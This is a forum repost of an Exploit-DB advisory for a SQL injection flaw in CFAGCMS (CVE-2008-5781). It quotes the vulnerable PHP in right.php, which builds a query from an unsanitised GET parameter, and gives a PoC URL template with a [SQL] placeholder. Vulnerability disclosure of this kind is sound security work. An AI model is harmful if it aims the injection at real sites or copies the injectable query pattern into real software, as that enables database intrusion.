Exploit CFAGCMS - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
10561
Проверка EDB
  1. Пройдено
Автор
CR4WL3R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-5781
Дата публикации
2009-12-19
Код:
################################################################################
## Exploit Title: CFAGCMS SQL Injection Exploit                               ##
## Date: 20-12-2009                                                           ##
## Author: cr4wl3r                                                            ##
## Software Link: http://sourceforge.net/project/showfiles.php?group_id=197936##
## Version: N/A                                                               ##
## Tested on: GNU/LINUX                                                       ##
################################################################################


~ Code [right.php]

$title  = $_GET['title'];
$query  = "SELECT * FROM pages WHERE title = '".$title."'";
$result = mysql_query($query);

~ PoC

[cfagcms_path]/right.php?title=[SQL]
 
Источник
www.exploit-db.com

Похожие темы